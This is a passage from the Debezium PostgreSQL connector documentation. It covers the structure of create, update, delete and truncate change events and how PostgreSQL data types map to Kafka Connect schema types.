\"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"postgres\",\n \"sequence\": \"[\\\"24023119\\\",\\\"24023128\\\"]\"\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 555,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`PostgreSQL_server.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.postgresql.Source` is the schema for the payload's `source` field. This schema is specific to the PostgreSQL connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`PostgreSQL_server.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `PostgreSQL_server` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. +\n +\n[NOTE]\n====\nWhether or not this field is available is dependent on the {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting for each table.\n====\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Stringified JSON array of additional offset information. 
The first value is always the last committed LSN; the second value is always the current LSN. Either value may be `null`.\n* Schema name\n* If the event was part of a snapshot\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies only to snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n\/\/ Type: continue\n[[postgresql-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\na|An optional field that contains values that were in the row before the database commit. In this example, only the primary key column, `id`, is present because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is, by default, `DEFAULT`.\n+\nFor an _update_ event to contain the previous values of all columns in the row, you would have to change the `customers` table by running `ALTER TABLE customers REPLICA IDENTITY FULL`.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. 
The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Schema name\n* If the event was part of a snapshot (always `false` for _update_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-postgresql-connector}#postgresql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n\/\/ Type: continue\n[[postgresql-primary-key-updates]]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of sending an `UPDATE` event record, the connector sends a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change:\n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n\/\/ Type: continue\n[[postgresql-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit. 
+\n +\nIn this example, the `before` field contains only the primary key column because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is `DEFAULT`.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contained the deleted row\n* Schema name\n* If the event was part of a snapshot (always `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\n[WARNING]\n====\nFor a consumer to be able to process a _delete_ event generated for a table that does not have a primary key, set the table's `REPLICA IDENTITY` to `FULL`. When a table does not have a primary key and the table's `REPLICA IDENTITY` is set to `DEFAULT` or `NOTHING`, a _delete_ event has no `before` field.\n====\n\nPostgreSQL connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[postgresql-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the PostgreSQL connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: continue\n[[postgresql-truncate-events]]\n=== _truncate_ events\n\nA _truncate_ change event signals that a table has been truncated.\nIn this case, the message key is `null`, and the message value looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... 
},\n \"payload\": {\n \"source\": { \/\/ <1>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"t\", \/\/ <2>\n \"ts_ms\": 1559033904961 \/\/ <3>\n }\n}\n----\n\n.Descriptions of _truncate_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _truncate_ event value, the `source` field structure is the same as for _create_, _update_, and _delete_ events for the same table, provides this metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|2\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `t`, signifying that this table was truncated.\n\n|3\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nIn case a single `TRUNCATE` statement applies to multiple tables,\none _truncate_ change event record for each truncated table will be emitted.\n\nNote that since _truncate_ events represent a change made to an entire table and don't have a message key,\nunless you're working with topics with a single partition,\nthere are no ordering guarantees for the change events pertaining to a table (_create_, _update_, etc.) and _truncate_ events for that table.\nFor instance a consumer may receive an _update_ event only after a _truncate_ event for that table,\nwhen those events are read from different partitions.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-map-data-types\n\/\/ Title: How {prodname} PostgreSQL connectors map data types\n[[postgresql-data-types]]\n== Data type mappings\n\nThe PostgreSQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the PostgreSQL data type of the column. 
The following sections describe how the connector maps PostgreSQL data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-basic-types[]\n* xref:postgresql-temporal-types[]\n* xref:postgresql-timestamp-type[]\n* xref:postgresql-decimal-types[]\n* xref:postgresql-hstore-type[]\n* xref:postgresql-domain-types[]\n* xref:postgresql-network-address-types[]\n* xref:postgresql-postgis-types[]\n* xref:postgresql-toasted-values[]\n\nendif::product[]\n\n[id=\"postgresql-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic types.\n\n.Mappings for PostgreSQL basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|n\/a\n\n|`BIT(1)`\n|`BOOLEAN`\n|n\/a\n\n|`BIT( > 1)`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits. The resulting `byte[]` contains the bits in little-endian form and is sized to contain the specified number of bits. For example, `numBytes = n\/8 + (n % 8 == 0 ? 0 : 1)` where `n` is the number of bits.\n\n|`BIT VARYING[(M)]`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits (2^31 - 1 in case no length is given for the column). The resulting `byte[]` contains the bits in little-endian form and is sized based on the content. 
The specified size `(M)` is stored in the length parameter of the `io.debezium.data.Bits` type.\n\n|`SMALLINT`, `SMALLSERIAL`\n|`INT16`\n|n\/a\n\n|`INTEGER`, `SERIAL`\n|`INT32`\n|n\/a\n\n|`BIGINT`, `BIGSERIAL`, `OID`\n|`INT64`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`DOUBLE PRECISION`\n|`FLOAT64`\n|n\/a\n\n|`CHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`VARCHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER VARYING[(M)]`\n|`STRING`\n|n\/a\n\n|`TIMESTAMPTZ`, `TIMESTAMP WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp` +\n +\nA string representation of a timestamp with timezone information, where the timezone is GMT.\n\n|`TIMETZ`, `TIME WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTime` +\n +\nA string representation of a time value with timezone information, where the timezone is GMT.\n\n|`INTERVAL [P]`\n|`INT64`\n|`io.debezium.time.MicroDuration` +\n(default) +\n +\nThe approximate number of microseconds for a time interval using the `365.25 \/ 12.0` formula for days per month average.\n\n|`INTERVAL [P]`\n|`STRING`\n|`io.debezium.time.Interval` +\n(when `interval.handling.mode` is set to `string`) +\n +\nThe string representation of the interval value that follows the pattern `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`, for example, `P1Y2M3DT4H5M6.78S`.\n\n|`BYTEA`\n|`BYTES` or `STRING`\n|n\/a +\n +\nEither the raw bytes (the default), a base64-encoded string, or a hex-encoded string, based on the connector's {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[binary handling mode] setting.\n\n|`JSON`, `JSONB`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nContains the string representation of a JSON document, array, or scalar.\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nContains the string representation of an XML document.\n\n|`UUID`\n|`STRING`\n|`io.debezium.data.Uuid` +\n +\nContains the string representation of a PostgreSQL UUID value.\n\n|`POINT`\n|`STRUCT`\n|`io.debezium.data.geometry.Point` +\n +\nContains a structure with two `FLOAT64` fields, `(x,y)`. Each field represents the coordinates of a geometric point.\n\n|`LTREE`\n|`STRING`\n|`io.debezium.data.Ltree` +\n +\nContains the string representation of a PostgreSQL LTREE value.\n\n|`CITEXT`\n|`STRING`\n|n\/a\n\n|`INET`\n|`STRING`\n|n\/a\n\n|`INT4RANGE`\n|`STRING`\n|n\/a +\n +\nRange of integer.\n\n|`INT8RANGE`\n|`STRING`\n|n\/a +\n +\nRange of `bigint`.\n\n|`NUMRANGE`\n|`STRING`\n|n\/a +\n +\nRange of `numeric`.\n\n|`TSRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range without a time zone.\n\n|`TSTZRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range with the local system time zone.\n\n|`DATERANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a date range. It always has an exclusive upper-bound.\n\n|`ENUM`\n|`STRING`\n|`io.debezium.data.Enum` +\n +\nContains the string representation of the PostgreSQL `ENUM` value. The set of allowed values is maintained in the `allowed` schema parameter.\n\n|===\n\n[id=\"postgresql-temporal-types\"]\n=== Temporal types\n\nOther than PostgreSQL's `TIMESTAMPTZ` and `TIMETZ` data types, which contain time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. 
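\n\nAs an illustration of the mappings that follow, the hypothetical table below (the table and column names are illustrative, not from the connector documentation) mixes column precisions; under the default `adaptive` mode, each column maps to the literal and semantic types noted in the comments:\n\n[source,sql,indent=0]\n----\n-- Hypothetical table that mixes temporal precisions.\nCREATE TABLE events_log (\n id SERIAL PRIMARY KEY,\n created_at TIMESTAMP(3), -- INT32\/INT64? No: INT64, io.debezium.time.Timestamp (milliseconds)\n updated_at TIMESTAMP(6), -- INT64, io.debezium.time.MicroTimestamp (microseconds)\n start_time TIME(3), -- INT32, io.debezium.time.Time (milliseconds)\n end_time TIME(6) -- INT64, io.debezium.time.MicroTime (microseconds)\n);\n----\n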
The following sections describe these mappings:\n\n* xref:postgresql-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:postgresql-time-precision-mode-adaptive-time-microseconds[`time.precision.mode=adaptive_time_microseconds`]\n* xref:postgresql-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[postgresql-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIMESTAMP(1)`, `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)`, `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-adaptive-time-microseconds]]\n.`time.precision.mode=adaptive_time_microseconds`\nWhen the `time.precision.mode` configuration property is set to `adaptive_time_microseconds`, the connector determines the literal type and semantic type for temporal types based on the column's data type definition. This ensures that events _exactly_ represent the values in the database, except all `TIME` fields are captured as microseconds.\n\n.Mappings when `time.precision.mode` is `adaptive_time_microseconds`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the time value in microseconds and does not include timezone information. PostgreSQL allows precision `P` to be in the range 0-6 to store up to microsecond precision.\n\n|`TIMESTAMP(1)`, `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)`, `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. 
However, because PostgreSQL supports microsecond precision, the events generated by a connector with the `connect` time precision mode *result in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`TIMESTAMP([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|===\n\n[id=\"postgresql-timestamp-type\"]\n=== TIMESTAMP type\n\nThe `TIMESTAMP` type represents a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `TIMESTAMP` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\" when `time.precision.mode` is not set to `connect`.\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\nPostgreSQL supports using `+\/-infinite` values in `TIMESTAMP` columns.\nThese special values are converted to timestamps with value `9223372036825200000` in case of positive infinity or `-9223372036832400000` in case of negative infinity.\nThis behavior mimics the standard behavior of the PostgreSQL JDBC driver; see the `org.postgresql.PGStatement` interface for reference.\n\n[id=\"postgresql-decimal-types\"]\n=== Decimal types\n\nThe setting of the PostgreSQL connector configuration property `decimal.handling.mode` determines how the connector maps decimal types.\n\nWhen the `decimal.handling.mode` property is set to `precise`, the connector uses the Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.\n\n.Mappings when `decimal.handling.mode` is `precise`\n[cols=\"28%a,17%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|===\n\nThere is an exception to this rule.\nWhen the `NUMERIC` or `DECIMAL` types are used without scale constraints, the values coming from the database have a different (variable) scale for each value. In this case, the connector uses `io.debezium.data.VariableScaleDecimal`, which contains both the value and the scale of the transferred value.\n
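\nA brief sketch of the distinction (the table and column names are illustrative):\n\n[source,sql,indent=0]\n----\n-- 'price' declares an explicit precision and scale, so under the default\n-- 'precise' mode it is encoded as org.apache.kafka.connect.data.Decimal\n-- with a fixed 'scale' schema parameter.\n-- 'weight' has no scale constraint, so each value is transferred as\n-- io.debezium.data.VariableScaleDecimal (value plus per-value scale).\nCREATE TABLE products (\n id SERIAL PRIMARY KEY,\n price NUMERIC(10, 2),\n weight NUMERIC\n);\n----\n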
\n.Mappings of decimal types when there are no scale constraints\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n +\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|`DECIMAL`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n +\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|===\n\nWhen the `decimal.handling.mode` property is set to `double`, the connector represents all `DECIMAL` and `NUMERIC` values as Java double values and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `double`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\n|\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\n|\n\n|===\n\nThe last possible setting for the `decimal.handling.mode` configuration property is `string`. In this case, the connector represents `DECIMAL` and `NUMERIC` values as their formatted string representation, and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `string`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\n|\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\n|\n\n|===\n\nPostgreSQL supports `NaN` (not a number) as a special value to be stored in `DECIMAL`\/`NUMERIC` columns when the setting of `decimal.handling.mode` is `string` or `double`. In this case, the connector encodes `NaN` as either `Double.NaN` or the string constant `NAN`.\n\n[id=\"postgresql-hstore-type\"]\n=== HSTORE type\n\nWhen the `hstore.handling.mode` connector configuration property is set to `json` (the default), the connector represents `HSTORE` values as string representations of JSON values and encodes them as shown in the following table. When the `hstore.handling.mode` property is set to `map`, the connector uses the `MAP` schema type for `HSTORE` values.\n\n.Mappings for `HSTORE` data type\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`HSTORE`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nExample: output representation using the JSON converter is `{\\\"key\\\" : \\\"val\\\"}`\n\n|`HSTORE`\n|`MAP`\n|n\/a +\n +\nExample: output representation using the JSON converter is `{\"key\" : \"val\"}`\n\n|===\n\n[id=\"postgresql-domain-types\"]\n=== Domain types\n\nPostgreSQL supports user-defined types that are based on other underlying types. When such column types are used, {prodname} exposes the column's representation based on the full type hierarchy.\n\n[IMPORTANT]\n====\nCapturing changes in columns that use PostgreSQL domain types requires special consideration. 
When a column is defined to contain a domain type that extends one of the default database types and the domain type defines a custom length or scale, the generated schema inherits that defined length or scale.\n\nWhen a column is defined to contain a domain type that extends another domain type that defines a custom length or scale, the generated schema does *not* inherit the defined length or scale because that information is not available in the PostgreSQL driver's column metadata.\n====\n\n[id=\"postgresql-network-address-types\"]\n=== Network address types\n\nPostgreSQL has data types that can store IPv4, IPv6, and MAC addresses. It is better to use these types instead of plain text types to store network addresses. Network address types offer input error checking and specialized operators and functions.\n\n.Mappings for network address types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`INET`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 networks\n\n|`CIDR`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 hosts and networks\n\n|`MACADDR`\n|`STRING`\n|n\/a +\n +\nMAC addresses\n\n|`MACADDR8`\n|`STRING`\n|n\/a +\n +\nMAC addresses in EUI-64 format\n\n|===\n\n[id=\"postgresql-postgis-types\"]\n=== PostGIS types\n\nThe PostgreSQL connector supports all link:http:\/\/postgis.net[PostGIS data types].\n\n.Mappings of PostGIS data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostGIS data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`GEOMETRY` +\n(planar)\n|`STRUCT`\na|`io.debezium.data.geometry.Geometry` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geometry object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see link:http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|`GEOGRAPHY` +\n(spherical)\n|`STRUCT`\na|`io.debezium.data.geometry.Geography` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geography object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see 